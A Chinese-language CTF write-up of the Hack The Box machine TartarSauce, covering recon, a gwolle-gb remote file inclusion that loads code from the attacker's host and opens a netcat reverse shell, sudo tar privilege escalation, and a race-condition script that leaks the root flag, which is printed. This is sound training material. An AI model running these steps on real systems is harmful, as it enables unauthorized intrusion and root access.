TartarSauce
Recon
Ports
sudo nmap -sS -F 10.129.1.185
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-03 20:33 CST
Nmap scan report for tartarsauce.htb (10.129.1.185)
Host is up (0.24s latency).
Not shown: 99 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds
仅开放端口80。
Welcome to TartarSauce
```..---::://////+++//////::-..```
`-/oosssyyyyyyyyyyyyyyyyyyyyyyyyyyyyysso/.
`ossyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysyyyyys`
-yyyyyyysssssssysyyyyyysyssssssssosyyyyyyyyy.
+yyyyyyyyysooossssyyyyyyyyyyysssssyyyyyyyyyy.
/yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.
/yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.
:yyyyyyyyyysoosyyyyyyysyyyyyysoosyyyyyyyyyyy.
-yyyyyyyyyhhhhhhhhhhhhyhhhhhhhhhhyyyyyyyyyyy-
-yyyyyyyyyyyyyyyhhhhhyyhhhhhyyyyyyyyyyyyyyyy-
-yyyyyyyyyyyyyyyyyyyyyyyyyyysyyyyyyyyyyyyyyy-
.syyyyyyyyyyyyyyyyyyyyyyyyyssyyyyyyyyyyyyyyy.
.+syyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysso`
:ooossooooooossssssssssssssssssssooooossssoo.
`.-:++++++////+++o++oooooooo++++++++++++/-.`
./////////++++++++ooo++++++++++//////:.
`-::::::::::::///++++++/////:::::::::::::.
.::-------------------------------:::::::::-`
`-:-----------...----------------------------::.
一个index页面,存在robots.txt文件。
User-agent: *
Disallow: /webservices/tar/tar/source/
Disallow: /webservices/monstra-3.0.4/
Disallow: /webservices/easy-file-uploader/
Disallow: /webservices/developmental/
Disallow: /webservices/phpmyadmin/
获取这几个url批量访问,只有monstra-3.0.4能够访问,但是遗憾的是其中的功能点均无法使用(使用报错),可能是兔子洞?会不会还有隐藏路径?继续进行目录扫描
feroxbuster --resume-from ./ferox-http_tartarsauce_htb_webservices_-1748954402.state
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-admin/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-content/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-includes/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-includes/certificates/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-includes/css/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-includes/customize/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-includes/fonts/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-admin/css/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-includes/images/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-includes/js/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-admin/images/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-admin/includes/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-admin/js/
🎯 Target Url │ http://tartarsauce.htb/webservices/wp/wp-admin/maint/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
^C🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_tartarsauce_htb_webservices_-1749111123.state ... [####################] - 0s 4745/4745 4745000/s http://tartarsauce.htb/webservices/ [####################] - 0s 4745/4745 4745000/s http://tartarsauce.htb/webservices/
[--------------------] - 0s 0/4745 - http://tartarsauce.htb/webservices/webservices/developmental
[--------------------] - 0s 0/4745 - http://tartarsauce.htb/webservices/webservices/tar/
[--------------------] - 0s 0/4745 - http://tartarsauce.htb/webservices/webservices/tar/tar/
[--------------------] - 0s 0/4745 - http://tartarsauce.htb/webservices/webservices/tar/tar/source
[--------------------] - 0s 0/4745 - http://tartarsauce.htb/webservices/webservices/monstra-3.0.4
[####################] - 0s 4745/4745 - **http://tartarsauce.htb/webservices/wp/**
[###########>--------] - 0s 2768/4745 - http://tartarsauce.htb/webservices/wp/wp-admin/
[#############>------] - 0s 3095/4745 - http://tartarsauce.htb/webservices/wp/wp-content/
[#############>------] - 0s 3192/4745 - http://tartarsauce.htb/webservices/wp/wp-includes/
[######>-------------] - 0s 1574/4745 - http://tartarsauce.htb/webservices/wp/wp-includes/certificates/
[######>-------------] - 0s 1450/4745 - http://tartarsauce.htb/webservices/wp/wp-includes/css/
[>-------------------] - 0s 167/4745 - http://tartarsauce.htb/webservices/wp/wp-includes/customize/
[>-------------------] - 0s 128/4745 - http://tartarsauce.htb/webservices/wp/wp-includes/fonts/
[###>----------------] - 0s 810/4745 - http://tartarsauce.htb/webservices/wp/wp-admin/css/
[###>----------------] - 0s 859/4745 - http://tartarsauce.htb/webservices/wp/wp-includes/images/
[###>----------------] - 0s 869/4745 - http://tartarsauce.htb/webservices/wp/wp-includes/js/
[#>------------------] - 0s 283/4745 - http://tartarsauce.htb/webservices/wp/wp-admin/images/
[##>-----------------] - 0s 708/4745 - http://tartarsauce.htb/webservices/wp/wp-admin/includes/
[#>------------------] - 0s 308/4745 - http://tartarsauce.htb/webservices/wp/wp-admin/js/
[#>------------------] - 0s 337/4745 - http://tartarsauce.htb/webservices/wp/wp-admin/maint/
发现还存在一个wp路径,是wordpress。 使用wpscan进行扫描,这里我扫了非常多次,-e 选项仅使用passive模式很可能是无法检测出插件的,使用mixed模式,可以扫描得到插件。
wpscan --url http://tartarsauce.htb/webservices/wp/ -e ap --plugins-detection mixed
i] Plugin(s) Identified:
[+] akismet
| Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/
| Last Updated: 2025-05-07T16:30:00.000Z
| Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.4
|
| Found By: Known Locations (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/, status: 200
|
| Version: 4.0.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/readme.txt
[+] brute-force-login-protection
| Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/
| Latest Version: 1.5.3 (up to date)
| Last Updated: 2017-06-29T10:39:00.000Z
| Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
|
| Version: 1.5.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
[+] gwolle-gb
| Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/
| Last Updated: 2025-05-30T08:18:00.000Z
| Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| [!] The version is out of date, the latest version is 4.9.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
|
| Version: 2.3.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
Exploit
对这三个插件版本进行版本漏洞查询,akismet与brute-force-login-protection和gwolle-gb。发现现有版本无有效的漏洞,翻看三个插件的readme文档发现gwolle-gb下的Changelog:
== Changelog ==
= 2.3.10 =
* 2018-2-12
* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D
= 1.5.3 =
* 2015-10-01
* When email is disabled, save it anyway when user is logged in.
* Add nb_NO (thanks Bjørn Inge Vårvik).
* Update ru_RU.
呵呵哒,有点东西(有1.5语)。 gwolle-gb 1.5.3版本存在一个RFI漏洞。
curl -s 'http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.47:80/'
nc -lvnp 4444
Ncat: Connection from 10.129.61.45:33620.
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1
12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
05:01:29 up 7:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1362): Inappropriate ioctl
for device
bash: no job control in this shell
www-data@TartarSauce:/$
User
进行基础信息搜集,www-data可以执行sudo -l
tching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
进行提权:
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/$ cd /tmp
cd /tmp
www-data@TartarSauce:/tmp$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
</null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
/usr/bin/script -qc /bin/bash /dev/null
onuma@TartarSauce:/tmp$ whoami
onuma
Root
在信息搜集过程中,未发现敏感文件。但在/var/backups下发现了很多备份重要文件是root权限的。但以onuma的权限并没有发现什么定时任务。
onuma@TartarSauce:/tmp$ ls -al /var/backups
ls -al /var/backups
total 12476
drwxr-xr-x 2 root root 4096 Jun 5 05:18 .
drwxr-xr-x 14 root root 4096 May 12 2022 ..
-rw-r--r-- 1 root root 40960 May 2 2018 alternatives.tar.0
-rw-r--r-- 1 root root 2125 Feb 17 2018 alternatives.tar.1.gz
-rw-r--r-- 1 root root 5649 May 1 2018 apt.extended_states.0
-rw-r--r-- 1 root root 787 Feb 20 2018 apt.extended_states.1.gz
-rw-r--r-- 1 root root 778 Feb 15 2018 apt.extended_states.2.gz
-rw-r--r-- 1 root root 768 Feb 12 2018 apt.extended_states.3.gz
-rw-r--r-- 1 root root 731 Feb 9 2018 apt.extended_states.4.gz
-rw-r--r-- 1 root root 437 Feb 9 2018 dpkg.diversions.0
-rw-r--r-- 1 root root 202 Feb 9 2018 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 202 Feb 9 2018 dpkg.diversions.2.gz
-rw-r--r-- 1 root root 202 Feb 9 2018 dpkg.diversions.3.gz
-rw-r--r-- 1 root root 202 Feb 9 2018 dpkg.diversions.4.gz
-rw-r--r-- 1 root root 207 Feb 9 2018 dpkg.statoverride.0
-rw-r--r-- 1 root root 171 Feb 9 2018 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 171 Feb 9 2018 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 171 Feb 9 2018 dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 171 Feb 9 2018 dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 510376 May 1 2018 dpkg.status.0
-rw-r--r-- 1 root root 146402 May 1 2018 dpkg.status.1.gz
-rw-r--r-- 1 root root 146472 Feb 21 2018 dpkg.status.2.gz
-rw-r--r-- 1 root root 146472 Feb 21 2018 dpkg.status.3.gz
-rw-r--r-- 1 root root 146030 Feb 15 2018 dpkg.status.4.gz
-rw------- 1 root root 785 Feb 9 2018 group.bak
-rw------- 1 root shadow 681 Feb 9 2018 gshadow.bak
-rw-r--r-- 1 onuma onuma 11511296 Jun 5 05:17 onuma-www-dev.bak
-rw-r--r-- 1 root root 18584 Jun 5 03:52 onuma_backup_error.txt
-rw-r--r-- 1 root root 219 Jun 5 05:17 onuma_backup_test.txt
-rw------- 1 root root 1615 Feb 9 2018 passwd.bak
-rw------- 1 root shadow 1067 Feb 20 2018 shadow.bak
能够批量备份,非常可能存在一个脚本文件。也许还是一个root权限定期执行的脚本?
上传一个pspy32,执行后发现 /bin/bash /usr/sbin/backuperer能以Root权限(UID=0)定期执行。
2025/05/04 23:41:26 CMD: UID=0 PID=5059 | /bin/bash /usr/sbin/backuperer
2025/05/04 23:41:26 FS: OPEN | /usr/bin/printf
2025/05/04 23:41:26 FS: ACCESS | /usr/bin/printf
2025/05/04 23:41:26 FS: OPEN | /usr/lib/locale/locale-archive
2025/05/04 23:41:26 FS: CLOSE_NOWRITE | /usr/bin/printf
2025/05/04 23:41:26 FS: CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2025/05/04 23:41:26 FS: OPEN | /usr/bin/printf
2025/05/04 23:41:26 FS: ACCESS | /usr/bin/printf
2025/05/04 23:41:26 FS: OPEN | /usr/lib/locale/locale-archive
2025/05/04 23:41:26 CMD: UID=0 PID=5070 |
2025/05/04 23:41:26 FS: CLOSE_NOWRITE | /usr/bin/printf
2025/05/04 23:41:26 FS: CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2025/05/04 23:41:26 FS: OPEN | /usr/bin/printf
2025/05/04 23:41:26 CMD: UID=0 PID=5071 | /usr/bin/printf -
2025/05/04 23:41:26 FS: ACCESS | /usr/bin/printf
2025/05/04 23:41:26 FS: OPEN | /usr/lib/locale/locale-archive
2025/05/04 23:41:26 FS: CLOSE_NOWRITE | /usr/bin/printf
2025/05/04 23:41:26 FS: CLOSE_NOWRITE | /usr/lib/locale/locale-archive
2025/05/04 23:41:26 CMD: UID=0 PID=5072 | /bin/bash /usr/sbin/backuperer
查看脚本内容:
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
对脚本文件进行审计,主要执行的内容是:
将/var/www文件夹下的所有文件压缩后移动到/var/backups文件夹下的onuma-www-dev.bak 压缩完成后sleep30秒且会进行一个完整性检查(integrity_chk()):使用diff命令递归比较$basedir和 $check$basedir($tmpdir/check/var/www/html)。如果有不同会将结果信息输出到$errormsg。
细节方面:
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)/dev/urandom是是一个伪随机数生成器设备文件,它提供由系统内核生成的伪随机数。它是/dev/random的变体。从/dev/urandom取出100个字节值后计算sha1值作为文件名。
- 在进行完整性校验时:
/bin/tar -zxvf $tmpfile -C $check会将临时文件解压缩到$check目录。最后再移动到\$bkpdir/onuma-www-dev.bak。 我们可以发现,针对备份文件的临时备份文件tmpfile和临时备份地址tmpdir。用户onuma是可以进行操控的,且脚本运行过程中会休眠30秒。那我们可以趁此时修改tmpfile中的内容(创建一个软连接)。再到执行diff命令时,可以在$errormsg得到执行信息。 利用脚本内容如下:1
#!/bin/bash
echo "Scipt is running, plz wait-----------"
# work in /dev/shm
cd /dev/shm
# look file change in /var/tmp
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
echo "now, moniting the /var/tmp"
#loop until $cur change
while [ "$start" == "$cur" -o "$cur" == "" ] ;do
sleep 10
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab a copy of the archive
echo "file have changed, copying here"
cp $cur .
#get filename
fn=$(echo $cur | cut -d'/' -f4)
#extract archive
tar -zxvf $fn
# remove robots.txt and replace it with /root/root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt
# del old zrchive
rm $fn
# create new archive
tar -zcvf $fn var
# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var
# wait result of
echo "Waiting for error log....."
tail -f /var/backups/onuma_backup_error.txt
exit 0
执行结果:
onuma@TartarSauce:/tmp$ ./b.sh
./b.sh
Scipt is running, plz wait-----------
now, moniting the /var/tmp
file changed, copying here
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot stat: Permission denied
tar: Exiting with failure status due to previous errors
rm: cannot remove '.7a680b69f27fcb50731c9ac9433d95108e388499': No such file or directory
rm: cannot remove 'var/www/html/webservices/monstra-3.0.4/public/uploads/.empty': Permission denied
Waiting for error log.....
Only in /var/www/html/webservices/wp/wp-content/plugins/gwolle-gb: index.html
Only in /var/www/html/webservices/wp/wp-content/plugins/gwolle-gb/lang: gwolle-gb-nl_NL.mo
Binary files /var/www/html/webservices/wp/wp-content/plugins/gwolle-gb/lang/gwolle-gb-ru_RU.mo and /var/tmp/check/var/www/html/webservices/wp/wp-content/plugins/gwolle-gb/lang/gwolle-gb-ru_RU.mo differ
Only in /var/www/html/webservices/wp/wp-content/plugins/gwolle-gb/lang: gwolle-gb-sv_SE.po
Only in /var/www/html/webservices/wp/wp-content/plugins/gwolle-gb: readme.txt
Only in /var/www/html/webservices/wp/wp-content: themes
Only in /var/www/html/webservices/wp/wp-content: upgrade
Only in /var/www/html/webservices/wp/wp-content: uploads
Only in /var/www/html/webservices/wp: wp-login.php
Only in /var/www/html/webservices/wp: wp-settings.php
Session terminated.
bash: [11335: 1 (255)] tcsetattr: Inappropriate ioctl for device
www-data@TartarSauce:/tmp$ ------------------------------------------------------------------------
Integrity Check Error in backup last ran : Thu Jun 5 03:52:50 EDT 2025
------------------------------------------------------------------------
/var/tmp/.7a680b69f27fcb50731c9ac9433d95108e388499
diff -r /var/www/html/robots.txt /var/tmp/check/var/www/html/robots.txt
1,7c1
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
<
---
> bfa4f288451beb847fd4cf78eaff3db5 (root.txt)
Only in /var/www/html/webservices/monstra-3.0.4/public/uploads: .empty
Summary
寻找立足点的过程更像是CTF,兔子洞有点多,层出不穷。Root部分,主要是对脚本进行审计,绕过。挺有趣的。